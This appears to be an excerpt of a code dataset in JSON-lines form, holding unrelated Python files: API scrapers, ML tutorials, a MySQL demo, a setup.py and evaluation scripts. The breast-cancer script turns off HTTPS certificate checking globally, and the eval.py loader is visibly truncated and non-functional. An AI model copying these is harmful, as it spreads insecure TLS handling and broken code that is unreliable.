json.loads(urllib.request.urlopen(url).read())\n        ne = geo[\"results\"][0][\"geometry\"][\"bounds\"][\"northeast\"]\n        sw = geo[\"results\"][0][\"geometry\"][\"bounds\"][\"southwest\"]\n        lat = ( ne[\"lat\"] + sw[\"lat\"] ) / 2\n        lng = ( ne[\"lng\"] + sw[\"lng\"] ) / 2\n        height = height + 30\n        url = \"http://maps.googleapis.com/maps/api/staticmap?key=\" + google_key + \"&center=\" + str(lat-0.5) + \",\" + str(lng) +\"&size=\"+str(width)+\"x\"+str(height)+\"&zoom=\"+str(zoom)+\"&sensor=false\"\n        # PIL needs a seekable binary buffer, so wrap the raw bytes in BytesIO\n        from io import BytesIO\n        buffer = BytesIO(urllib.request.urlopen(url).read())\n        image = Image.open(buffer)\n        image = image.crop((0,0,image.size[0],image.size[1]-30))\n        return image\n    except:\n        return None","sub_path":"static/py/googleMaps.py","file_name":"googleMaps.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"553556068","text":"from PyQt4 import QtCore, QtGui\r\nfrom VideoCapture import Device\r\nfrom PIL import Image, ImageQt\r\nimport sys\r\nimport time\r\n\r\napp = QtGui.QApplication(sys.argv)\r\nwindow = QtGui.QWidget()\r\nlayout = QtGui.QGridLayout(window)\r\n\r\nbutton = QtGui.QLabel()\r\n\r\n\r\ncam = Device(0)\r\n\r\npilImage = cam.getImage()\r\nqimg = ImageQt.ImageQt(pilImage)\r\nqPixmap = QtGui.QPixmap.fromImage(qimg)\r\nbutton.setPixmap(qPixmap)\r\ntime.sleep(10)\r\ndel(cam)\r\n\r\n\r\nlayout.addWidget(button)\r\n\r\nwindow.show()\r\napp.exec_()\r\n","sub_path":"Program za tablo/OratorijPyQt/testz/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"115578791","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 24 21:43:46 2019\r\n\r\n@author: 國倫\r\n\"\"\"\r\n\r\n\r\nwhile True:\r\n    try:\r\n# read the height in cm and convert it to metres squared\r\n        height = (float(input('Enter height (cm): ')) / 100)**2\r\n# read the weight in kg\r\n        weight = float(input('Enter weight (kg): '))\r\n# BMI = weight divided by height squared\r\n        bmi = weight / height\r\n# round to one decimal place\r\n        print(round(bmi,1 ) )\r\n        action = input('Press Enter to retry or type N to quit: ')\r\n        if action == 'N':\r\n            break\r\n    except:\r\n        print('Please enter a number')\r\n\r\n\r\n","sub_path":"KUO_LUN/write/30 python/try_except.py","file_name":"try_except.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"223266981","text":"import datetime\nimport time\n\n\nfrom requests import Session\n\n\nfrom .models import Coins, Exchange\n\nheaders = {\n    'Accepts': 'application/json'\n\n}\n\nsession = Session()\nsession.headers.update(headers)\ndelay = 4500\n\n\ndef save_exchange(pk):\n\n    \"\"\" save exchange data to the database \"\"\"\n\n    url = f'https://api.coingecko.com/api/v3/exchanges/{pk}'\n    data = session.get(url)\n    response_data = data.json()\n    name = response_data['name'].lower()\n    image = response_data['image']\n    slug = response_data['name']\n    trade_url = response_data['url']\n    exchange = Exchange(\n        name=name,\n        image=image,\n        slug=slug,\n        trade_url=trade_url\n    )\n    exchange.save()\n    print('saved -', exchange.name)\n    return exchange\n\n\ndef get_exchange(pk):\n\n    \"\"\"\n    get exchange data for an exchange name\n    \"\"\"\n\n    url = f'https://api.coingecko.com/api/v3/exchanges/{pk}'\n    data = session.get(url)\n    print(data, pk)\n    exchange_db = Exchange.objects.filter(name=pk).first()\n    if exchange_db:\n        return\n    else:\n        try:\n            return save_exchange(pk)\n        except:\n            print('none')\n\n\ndef get_exchanges_list():\n\n    \"\"\"\n    fetch the full list of exchanges and save each new one\n    \"\"\"\n    
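# walk every exchange id returned by the CoinGecko list endpoint, sleeping between calls to respect rate limits\n    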
counter = 0\n url = 'https://api.coingecko.com/api/v3/exchanges/list'\n response_exchanges = session.get(url)\n data = response_exchanges.json()\n for exchange in data:\n counter = counter+1\n exchange_pk = exchange['id']\n print(counter)\n time.sleep(2)\n get_exchange(exchange_pk)\n\n\ndef get_chart_data(id):\n\n \"\"\"\n history data (price 7d) for coin name\n \"\"\"\n\n list_price_7d = {}\n days = 7\n today_date = datetime.date.today() - datetime.timedelta(days=days)\n\n while days >= 1:\n url_price_7d = f'''\n https://api.coingecko.com/api/v3/coins/{id}/history?date={today_date.strftime(\"%d-%m-%Y\")}\n '''\n response_price_7d = session.get(url_price_7d)\n data_price = response_price_7d.json()\n data_price_today = data_price['market_data']['current_price']['usd']\n today_date = datetime.date.today() - datetime.timedelta(days=days-1)\n list_price_7d[str(days)] = data_price_today\n days = days - 1\n return list_price_7d\n\n\ndef update_price_coin(coin_symbol):\n\n \"\"\"\n request for name_coin data\n \"\"\"\n\n name_coin = coin_symbol.lower()\n url = f'https://api.coingecko.com/api/v3/coins/{name_coin}/'\n response = session.get(url)\n data = response.json()\n price_7d = get_chart_data(coin_symbol)\n price = data['market_data']['current_price']['usd']\n market_cap = data['market_data']['market_cap']['usd']\n volume = int(data['market_data']['total_volume']['usd'])\n image = str(data['image']['small'])\n price_exc = int(data['market_data']['price_change_percentage_24h'])\n\n return price, market_cap, volume, image, price_exc, price_7d\n\n\ndef get_update_price_coins():\n \"\"\"\n update data for coins\n \"\"\"\n\n for coin in Coins.objects.all():\n print(coin)\n time.sleep(5)\n try:\n (\n coin.price,\n coin.market_cap,\n coin.volume,\n coin.image,\n coin.price_exc,\n coin.board_price\n ) = update_price_coin(coin.name)\n coin.save()\n except:\n print('except')\n\n\ndef add_market_for_coin(market_id, coin):\n\n \"\"\"\n add many to many Exchange for coin\n \"\"\"\n\n exchange = Exchange.objects.filter(name=market_id).first()\n print(exchange, market_id)\n if not exchange:\n try:\n new_exchange = save_exchange(market_id)\n coin.market_exchange.add(new_exchange)\n except:\n print('error')\n else:\n print('add')\n coin.market_exchange.add(exchange)\n\n\ndef get_market_coins(coins):\n\n \"\"\"\n get markets for coin id\n \"\"\"\n\n for coin in coins:\n url = f'https://api.coingecko.com/api/v3/coins/{coin}/tickers'\n response = session.get(url)\n data = response.json()\n for market in data['tickers']:\n print(coin)\n market_name = market['market']['identifier']\n time.sleep(2)\n add_market_for_coin(market_name.lower(), coin)\n","sub_path":"apps/coins/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"390584646","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 11 10:38:39 2020\n\n@author: vb18255\n\"\"\"\n\n\nfrom sklearn.datasets import load_iris\niris = load_iris()\nX = iris.data\ny = iris.target\n# =============================================================================\n# feature_names = iris.feature_names\n# target_names = iris.target_names\n# print(\"Feature names:\", feature_names)\n# print(\"Target names:\", target_names)\n# print(\"\\nFirst 10 rows of X:\\n\", X[:10])\n# print('=================')\n# print(X)\n# =============================================================================\nfrom sklearn.model_selection import 
train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 1)\n\nprint(X_train.shape)\nprint(X_test.shape)\n\nprint(y_train.shape)\nprint(y_test.shape)\n","sub_path":"Scikitlearn/scikitlearn.py","file_name":"scikitlearn.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"54748570","text":"from os import path, makedirs, chdir\nimport subprocess\nfrom distutils.core import setup\nfrom distutils.command.build import build as _build\n\ncmake_bin = \"cmake\"\ncmake_dir = \"build-python-distutils\"\ncmake_build_config = \"Release\"\ncmake_build_target = \"_tinysplinepython\"\n\nscript_dir = path.dirname(path.realpath(__file__))\nbuild_dir = script_dir + path.sep + cmake_dir\n\n\nclass BuildWithCmake(_build):\n def run(self):\n # create the build directory if necessary\n if not path.exists(build_dir):\n makedirs(build_dir)\n\n # generate make files\n chdir(build_dir)\n cmake_cmd = [cmake_bin, \"..\",\n \"-DCMAKE_BUILD_TYPE=\" + cmake_build_config]\n if subprocess.call(cmake_cmd) != 0:\n raise EnvironmentError(\"error calling cmake\")\n chdir(script_dir)\n\n # build the python binding\n cmake_cmd = [cmake_bin, \"--build\", build_dir,\n \"--config\", cmake_build_config,\n \"--target\", cmake_build_target]\n if subprocess.call(cmake_cmd) != 0:\n raise EnvironmentError(\"error building project\")\n\n # can't use super() here because _build is an\n # old style class in 2.7\n _build.run(self)\n\n\nsetup(name='tinyspline',\n version='0.1.0.dev',\n description='Python binding for TinySpline',\n long_description='''\n TinySpline is a C library for NURBS, B-Splines and Bezier curves\n (even lines and points) with a modern C++11 wrapper and bindings\n for C#, Java and Python (via Swig). 
The goal of this project is\n to provide a small library with a minimum set of dependencies\n which is easy and intuitively to use.''',\n author='Marcel Steinbeck',\n author_email='github@retux.de',\n license='MIT',\n url='https://github.com/retuxx/tinyspline',\n platforms='Any',\n cmdclass={'build': BuildWithCmake},\n packages=['tinyspline'],\n package_dir={'tinyspline': cmake_dir + '/library'},\n package_data={'tinyspline': ['*tinysplinepython*']}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"365379193","text":"#pip install mysqlclient\r\nimport MySQLdb\r\n\r\ndef main():\r\n \r\n # Defining and manipulating database\r\n\r\n # Establish database connection\r\n conn = MySQLdb.connect(\"localhost\",\"root\",\"\",\"workshop\")\r\n print('Database Connected Successfully!!')\r\n \r\n # Create a cursor\r\n cur = conn.cursor()\r\n\r\n # Create a table\r\n cur.execute('CREATE TABLE STUDENT\\\r\n (RollNum INT,\\\r\n Name VARCHAR(20),\\\r\n Percentage INT);')\r\n print('Table Created Successfully!!')\r\n \r\n # Inserting data into table\r\n cur.execute(\"INSERT INTO STUDENT VALUES (1, 'Hiten', 89);\")\r\n cur.execute(\"INSERT INTO STUDENT VALUES (2, 'Muskan', 85);\")\r\n cur.execute(\"INSERT INTO STUDENT VALUES (3, 'Nidhi', 78);\")\r\n cur.execute(\"INSERT INTO STUDENT VALUES (4, 'Nikhil', 55);\")\r\n cur.execute(\"INSERT INTO STUDENT VALUES (5, 'Deepti', 95);\")\r\n print('Data Inserted Successfully!!')\r\n\r\n conn.commit()\r\n \r\n # Retrieving data from table\r\n print('Output of Select Queries')\r\n print('Retrieving roll numbers, names, and percentages of students')\r\n cur.execute('SELECT RollNum, Name, Percentage FROM\\\r\n STUDENT;')\r\n print(cur.fetchall())\r\n \r\n print('Retrieving all attribute values of students')\r\n cur.execute('SELECT * FROM STUDENT;')\r\n print(cur.fetchall())\r\n \r\n print('Retrieving roll numbers and names of students')\r\n cur.execute('SELECT RollNum, Name FROM STUDENT;')\r\n print(cur.fetchall())\r\n \r\n print('Retrieving all attribute values of students with\\\r\n percentage greater than 80')\r\n cur.execute('SELECT * FROM STUDENT WHERE Percentage > 80;')\r\n print(cur.fetchall())\r\n\r\n # Close the connection\r\n conn.close()\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"database/MYSQl.py","file_name":"MYSQl.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"364346965","text":"import json\nimport sys\ndef readJson(filename):\n with open(filename,'r') as f:\n d=json.load(f)\n return d\n\ndef main():\n args = sys.argv[1]\n people = readJson(args)[\"people\"]\n skills = {}\n for person in people:\n for skill in person[\"skills\"]:\n if skill[\"name\"] in skills:\n if skill[\"level\"] > skills[skill[\"name\"]][0]:\n skills[skill[\"name\"]] = (skill[\"level\"],person[\"first_name\"] + person[\"last_name\"])\n else:\n skills[skill[\"name\"]] = (skill['level'],person[\"first_name\"] + person[\"last_name\"])\n for key,value in skills.items():\n print(key,value[1])\n\nif __name__ == '__main__':\n main() \n","sub_path":"week03/CodingSkills.py","file_name":"CodingSkills.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"563667259","text":"from flask_security.utils import encrypt_password\n\nfrom 
backend import db, app\nfrom backend.models import Building, BuildingImage, Architect, MetroRoute, MetroStation, District, Region, \\\n    BuildingNumberFact, BuildingTextFact, Style, ArchitectFact, Element, ElementPlace, ElementExample, User, Role\n\nfrom backend import user_datastore\n\nfrom datetime import datetime\nimport random\n\ntext = 'Жилой дом на Котельнической набережной — одна из «сталинских высоток» в Москве, находится в ' \\\n       'устье реки Яузы по адресу Котельническая набережная № 1/15. Построена в 1938—1952 годах; авторы ' \\\n       'проекта — Д. Н. Чечулин, А. К. Ростковский, инженер Л. М. Гохман. Является памятником ' \\\n       'архитектуры регионального значения. «Старый», 9-этажный жилой корпус, ' \\\n       'выходящий на Москва-реку, был спроектирован в 1938 году и завершён в 1940-м. Центральный объём ' \\\n       'строился в 1948—1952 годах. Он насчитывает 26 этажей (32 вместе с техническими этажами) и имеет ' \\\n       'высоту 176 м. Всего в здании находятся 700 квартир, 540 из них расположены в ' \\\n       'центральном объёме (из них 336 двухкомнатных, 173 трёхкомнатных, 18 четырёхкомнатных и 13 ' \\\n       'однокомнатных). Из широких окон квартир на верхних этажах открывается вид на город, Москву-реку ' \\\n       'и Кремль. Также в здании находятся магазины, почтовое отделение, кинотеатр «Иллюзион» (базовый ' \\\n       'кинотеатр Госфильмофонда; выходит на Большой Ватин переулок), музей-квартира Г. С. Улановой (' \\\n       'открылась в 2004 году в кв. № 185 — балерина жила здесь с 1986 года, а ранее, с октября 1952 ' \\\n       'года, занимала квартиру № 316 в корпусе Б). Помещения общественного назначения, ' \\\n       'такие как овощной (со стороны Подгорной набережной) и кондитерский (торец здания со стороны ' \\\n       'Верхней Радищевской) магазины, существовавшие до начала 2000-х годов, отличались своими ' \\\n       'интерьерами: стены и потолки были богато украшены пышными росписями с изображениями цветочных ' \\\n       'гирлянд и всевозможных даров природы. Входные вестибюли и лифтовые холлы жилых подъездов также ' \\\n       'декорированы барельефами, лепниной и росписями. Корпус А был изначально заселён ' \\\n       'работниками НКВД[3]. Дом строили советские заключённые и немецкие военнопленные[' \\\n       '4][5][6], привлечённые через Главное управления лагерей промышленного строительства (' \\\n       'Главпромстрой)[7]. 
'\n\n\ndef generate_text():\n return ' '.join([\n ''.join([random.choice('абвгдеёжзийклмнопрстуфхцчшщъыьэюя')\n for _ in range(1, random.randint(4, 10))])\n for _ in range(1, random.randint(26, 50))\n ])\n\n\ndef create_db():\n with app.app_context():\n app.logger.info('reflecting db')\n db.reflect()\n\n app.logger.info('dropping db')\n db.drop_all()\n\n app.logger.info('creating db')\n db.create_all()\n\n roles = [\n Role(name=\"user\"),\n Role(name=\"superuser\")\n ]\n db.session.add_all(roles)\n\n user_datastore.create_user(\n first_name='Никита',\n last_name='Кулаков',\n email='kul7nik@gmail.com',\n password=encrypt_password('Kul7nick'),\n roles=roles,\n )\n user_datastore.create_user(\n first_name='Екатерина',\n last_name='Лебедева',\n email='katerlebedevaa@yandex.ru',\n password=encrypt_password('Lasunec123'),\n roles=roles[:1],\n )\n\n routes = [\n MetroRoute(\n color='rgb({0},{1},{2})'.format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),\n name='Ветка #' + str(i)\n ) for i in range(1, 11)\n ]\n\n regions = [\n Region(\n name='Округ #' + str(i),\n abbr='ABBR',\n description=generate_text()[:50]\n ) for i in range(1, 11)\n ]\n\n districts = [\n District(\n name='Район #' + str(i),\n region=regions[(i - 1) // 4],\n description=generate_text()[:50]\n ) for i in range(1, 41)\n ]\n\n stations = [\n MetroStation(\n name='Станция #' + str(i),\n district=districts[i - 1],\n routes=[routes[(i - 1) % len(routes)], routes[i % len(routes)]],\n description=generate_text()[:50]\n ) for i in range(1, 41)\n ]\n\n app.logger.info('creating buildings')\n buildings = [\n Building(\n title='Title #' + i,\n title_info='Some info in title #' + i,\n year_build_start=int(datetime.now().year),\n year_build_end=int(datetime.now().year),\n leading_img_path='visotka.jpg',\n latitude=random.uniform(55.614926, 55.860389),\n longitude=random.uniform(37.416317, 37.772211),\n images=[\n BuildingImage(\n name='image #{}:{}'.format(1, i),\n path='shema.jpg'\n ),\n BuildingImage(\n name='image #{}:{}'.format(2, i),\n path='visota.jpg'\n ),\n BuildingImage(\n name='image #{}:{}'.format(3, i),\n path='visotka.jpg'\n )\n\n ],\n text=text,\n address='address #' + i,\n station=stations[random.randint(0, 39)],\n district=districts[random.randint(0, 39)],\n number_facts=[\n BuildingNumberFact(\n number=j * random.randint(1, 100),\n name='nfact #' + str(j)\n )\n for j in range(1, random.randint(2, 4))\n ],\n text_facts=[\n BuildingTextFact(\n text=generate_text()\n )\n ]\n ) for i in map(str, range(1, 11))\n ]\n\n architects = [\n Architect(name='Name#' + str(i),\n surname='Surname#' + str(i),\n patronymic='Patronymic#' + str(i),\n born=random.choice([1825, 1927, None, 1953]),\n died=random.choice([1825, 1927, None, 1953]),\n alive=random.choice([False, False, False, True]),\n place_of_birth='Place of birth #' + str(i),\n quote=generate_text()[:100],\n text=text,\n img_path='shusev.jpg',\n facts=[\n ArchitectFact(\n name='name#' + str(i),\n text=generate_text()[:60]\n )\n for i in range(1, random.randint(2, 5))\n ],\n square_img='arch-square.png',\n portrait_img='arch-portrait.png',\n landscape_img='arch-landscape.png'\n\n )\n for i in range(1, 20)\n ]\n for i, architect in enumerate(architects):\n if i < len(architects) - 1:\n architect.buildings = [buildings[i % len(buildings)], buildings[(i+1) % len(buildings)]]\n else:\n architect.buildings = [buildings[i % len(buildings)]]\n\n styles = [\n Style(name=\"Стиль #\" + str(i),\n date=random.choice([1800, 1810, 1825, 1840, 1860, 1875]),\n 
philosophy='philosophy #' + str(i),\n ideology='ideology #' + str(i),\n text=text,\n fact=generate_text(),\n architects=[architects[i - 1], architects[(i * 2) % len(architects)]],\n buildings=[buildings[i - 1]],\n building_img_path='klass-build.svg',\n column_img_path='klass-col.svg',\n door_handle_img_path='klass-door.svg',\n description=generate_text()[:75]\n )\n for i in range(1, 11)\n ]\n for i, style in enumerate(styles):\n if i != 0:\n styles[i].previous = styles[i - 1]\n\n elements = [\n Element(\n name='Element#' + str(i),\n date=random.choice([1800, 1810, 1825, 1840, 1860, 1875]),\n text=text,\n styles=[styles[i - 1], styles[i * 2 % len(styles)]],\n places=[\n ElementPlace(\n name='Element Place #1:' + str(i)\n ),\n ElementPlace(\n name='Element Place #2:' + str(i)\n ),\n ElementPlace(\n name='Element Place #3:' + str(i)\n ),\n ElementPlace(\n name='Element Place #4:' + str(i)\n ),\n ],\n examples=[\n ElementExample(\n img_path='usadba.jpg',\n building=buildings[i - 1]\n ),\n ElementExample(\n img_path='usadba.jpg',\n building=buildings[i * 2 % len(buildings)],\n ),\n ],\n img_path='kartush.svg',\n description=generate_text()[:60]\n )\n for i in range(1, 11)\n ]\n\n db.session.add_all(buildings)\n db.session.add_all(architects)\n db.session.add_all(routes)\n db.session.add_all(stations)\n db.session.add_all(districts)\n db.session.add_all(regions)\n db.session.add_all(styles)\n db.session.add_all(elements)\n\n db.session.commit()\n","sub_path":"backend/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"456318735","text":"import codecs\nfrom dataset.tokenization import BertTokenizer\n\nvocab_path = \"data/vocab.list\"\n\ndef split(path):\n readfile = codecs.open(path)\n writefile = codecs.open(path + 'smooth', mode='w')\n tokenizer = BertTokenizer(vocab_path)\n\n for i in readfile.readlines():\n line = i.strip()\n sub_list = tokenizer.tokenize(line)\n print(sub_list)\n\n new_line, _ = merge_subword(sub_list)\n\n writefile.write(new_line + '\\n')\n\n\ndef merge_subword(subword_list):\n ret_sent = []\n align = []\n index = 0\n prev = \"\"\n for step, word in enumerate(subword_list):\n if \"##\" in word:\n prev += word.strip(\"##\")\n else:\n if prev != \"\":\n ret_sent.append(prev)\n index += 1\n prev = word\n\n align.append(index)\n\n if prev != \"\":\n ret_sent.append(prev)\n\n return \" \".join(ret_sent), align\n\n\nif __name__ == \"__main__\":\n split(\"./final_result/wiki/untswiki\")\n","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"4545766","text":"import numpy as np\nfrom IPython import embed\n\ndef change_pose(points_pre, points_true):\n \"\"\"\n the function is to change the format to (X,Y,Z) , (X,Y,Z) ....\n \"\"\"\n predict = []\n gt = []\n if len(points_pre) > 0:\n for pose in points_pre:\n for i in range(19):\n joint = []\n X = pose[0][i]\n Y = pose[1][i]\n Z = pose[2][i]\n joint.append(i) #joint type\n joint.append(X)\n joint.append(Y)\n joint.append(Z)\n predict.append(joint)\n \n if len(points_true) > 0:\n for pose in points_true:\n for i in range(19):\n joint = []\n X = pose[0][i]\n Y = pose[1][i]\n Z = pose[2][i]\n joint.append(i)\n joint.append(X)\n joint.append(Y)\n joint.append(Z)\n gt.append(joint)\n\n return predict , gt\n\ndef dist(p1, p2, th):\n \"\"\"\n type: (Seq, Seq, float) -> 
float\n    3D Point Distance\n    p1: predicted point\n    p2: GT point\n    th: the max acceptable distance\n    return: euclidean distance between the positions of the two joints\n    \"\"\"\n    if p1[0] != p2[0]:\n        return np.nan\n    d = np.linalg.norm(np.array(p1[1:]) - np.array(p2[1:]))\n    return d if d <= th else np.nan\n\ndef non_minima_suppression(x):\n    \"\"\"\n    return: non-minima suppressed version of the input array\n    suppressed values become np.nan\n    \"\"\"\n    min = np.nanmin(x)\n    x[x != min] = np.nan\n    if len(x[x == min]) > 1:\n        ok = True\n        for i in range(len(x)):\n            if x[i] == min and ok:\n                ok = False\n            else:\n                x[i] = np.nan\n    return x\n\ndef not_nan_count(x):\n    \"\"\"\n    :return: number of not-np.nan elements of the array\n    (returns a single number)\n    \"\"\"\n    return len(x[~np.isnan(x)])\n\n\n\ndef joint_det_metrics(points_pre, points_true, th=7.0):\n    \"\"\"\n    points_pre : the predicted poses in camera coordinates\n    points_true: the ground-truth poses in camera coordinates\n    th: distance threshold; all distances > th will be considered 'np.nan'.\n    return : a dictionary of metrics, 'met', related to joint detection;\n        the available metrics are:\n        (1) met['tp'] = number of True Positives\n        (2) met['fn'] = number of False Negatives\n        (3) met['fp'] = number of False Positives\n        (4) met['pr'] = PRecision\n        (5) met['re'] = REcall\n        (6) met['f1'] = F1-score\n    \"\"\"\n    predict, gt = change_pose(points_pre=points_pre, points_true=points_true)\n    if len(predict) > 0 and len(gt) > 0:\n        mat = []\n        for p_true in gt:\n            row = np.array([dist(p_pred, p_true, th=th) for p_pred in predict])\n            mat.append(row)\n        mat = np.array(mat)\n        mat = np.apply_along_axis(non_minima_suppression, 1, mat)\n        mat = np.apply_along_axis(non_minima_suppression, 0, mat)\n\n        # calculate joint detection metrics\n        nr = np.apply_along_axis(not_nan_count, 1, mat)\n        tp = len(nr[nr != 0])   #number of true positives / predicted and present in the ground truth\n        fn = len(nr[nr == 0])   #number of false negatives / in the ground truth but never predicted\n        fp = len(predict) - tp  #predicted but not matching any ground-truth joint\n        pr = tp / (tp+fp)\n        re = tp / (tp+fn)\n        f1 = (2 * tp) / (2 * tp + fn + fp)\n\n    elif len(predict) == 0 and len(gt) == 0:\n        tp = 0  #number of true positives\n        fn = 0  #number of false negatives\n        fp = 0  #number of false positives\n        pr = 1.0\n        re = 1.0\n        f1 = 1.0\n    elif len(predict) == 0:\n        tp = 0\n        fn = len(gt)\n        fp = 0\n        pr = 0.0\n        re = 0.0\n        f1 = 0.0\n    else:\n        tp = 0\n        fn = 0\n        fp = len(predict)\n        pr = 0.0\n        re = 0.0\n        f1 = 0.0\n\n    metrics = {\n        'tp':tp, 'fn':fn, 'fp':fp,\n        'pr':pr, 're':re, 'f1':f1,\n    }\n\n    return metrics","sub_path":"lib/test_metric.py","file_name":"test_metric.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"458687577","text":"import pickle\nimport numpy as np\nimport os\nimport json\nfrom random import shuffle\nimport sys\nfrom decoder import Decoder\nsys.path.append('..')\nfrom config import data_path, experiment_id\nfrom tqdm import tqdm\n\nclass Evaluator:\n    def __init__(self):\n        self.decoder = Decoder()\n\n    def evaluate(self, samples=200):\n        \"\"\"\n        Run decoding with the decoder on a fixed number of pairs from the evaluation set.\n\n        :param samples:\n        :return:\n        \"\"\"\n        best_hit = 0\n        n_best_hit = 0\n\n        with open('eval_log_e{}.txt'.format(experiment_id), 'w', encoding='utf-8') as f:\n            x_, y_ = self.load_eval_set()\n            for x, y in tqdm(zip(x_[:samples], y_[:samples])):\n                results = self.decoder.decode(x)\n                # convert to list of strings\n                sentences = [''.join([x.split('/')[0] for x in item[1]]) for item in results]\n                if y == sentences[0]:\n                    best_hit 
+= 1\n                    f.write('best hit\\n')\n                elif y in sentences:\n                    f.write('nbest hit\\n')\n                    n_best_hit += 1\n                else:\n                    f.write('no hit\\n')\n\n                f.write('{}\\t{}\\n'.format(y, x))\n                for item in sentences:\n                    f.write('{}\\n'.format(item))\n\n            f.write('best_hit {} nbest_hit {} no_hit {} samples {}'.format(best_hit, n_best_hit, samples-best_hit-n_best_hit, samples))\n            print('best_hit {} nbest_hit {} no_hit {} samples {}'.format(best_hit, n_best_hit, samples-best_hit-n_best_hit, samples))\n\n    def load_eval_set(self, debug=True):\n        \"\"\"\n        Read the test portion of the corpus.\n\n        :return: Reading and sentence pairs. Sentences that contain OOV tokens are removed.\n        \"\"\"\n        def has_oov(tokens):\n            for token in tokens:\n                if '':\n                    # start of current sentence\n                    if len(tokens) > 0 and not has_oov(tokens):\n                        # print(tokens)\n                        readings = [x.split('/')[1] if x.split('/')[1] != '' else x.split('/')[0] for x in tokens]\n                        words = [x.split('/')[0] for x in tokens]\n                        x.append(''.join(readings))\n                        y.append(''.join(words))\n\n                    tokens = []\n\n                else:\n                    tokens.append(token)\n\n        print('{} pairs loaded'.format(len(x)))\n\n        return x, y\n\nif __name__ == '__main__':\n    evaluator = Evaluator()\n    evaluator.evaluate()","sub_path":"decoder/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"431258596","text":"\n\nfrom xai.brain.wordbase.verbs._out import _OUT\n\n#class header\nclass _OUTED(_OUT, ):\n\tdef __init__(self,): \n\t\t_OUT.__init__(self)\n\t\tself.name = \"OUTED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"out\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_outed.py","file_name":"_outed.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"466763262","text":"import pandas as pd\r\nimport numpy as np\r\nimport ssl\r\nssl._create_default_https_context = ssl._create_unverified_context\r\ncolumn_names=[\"Sample code number\",\"Clump Thickness\",\"Uniformity of Cell Size\",\r\n              \"Uniformity of Cell Shape\",\"Marginal Adhesion\",\"Single Epithelial Cell Size\",\r\n             \"Bare Nuclei\",\"Bland Chromatin\", \"Normal Nucleoli\", \"Mitoses\",\"Class\"]\r\ndata=pd.read_csv(r\"https://archive.ics.uci.edu/ml/machine-learning-databases/breast-cancer-wisconsin/breast-cancer-wisconsin.data\",names=column_names)\r\n#data=pd.read_csv(r\"C:\\Users\\dell\\Desktop\\test\\breastCancer.csv\",names=column_names)\r\ndata=data.replace(to_replace=\"?\",value=np.nan)\r\ndata.head(20)\r\ndata=data.dropna(how='any')\r\ndata.shape\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,y_train,y_test=train_test_split(data[column_names[1:10]],data[column_names[10]],test_size=0.25,random_state=33)\r\ny_test.value_counts()\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.linear_model import SGDClassifier\r\n## standardize the data\r\n## for training data, fit the parameters\r\n## for test data, use the fitted parameters directly\r\nss=StandardScaler()\r\nX_train=ss.fit_transform(X_train)\r\nX_test=ss.transform(X_test)\r\n# use logistic regression to get the parameters\r\nlr=LogisticRegression()\r\nlr.fit(X_train,y_train)\r\nlr_y_predict=lr.predict(X_test)\r\n# use the SGD classifier to get the parameters\r\nsgdc=SGDClassifier()\r\nsgdc.fit(X_train,y_train)\r\nsgdc_y_predict=sgdc.predict(X_test)\r\n# Analyse the result of the classification: 
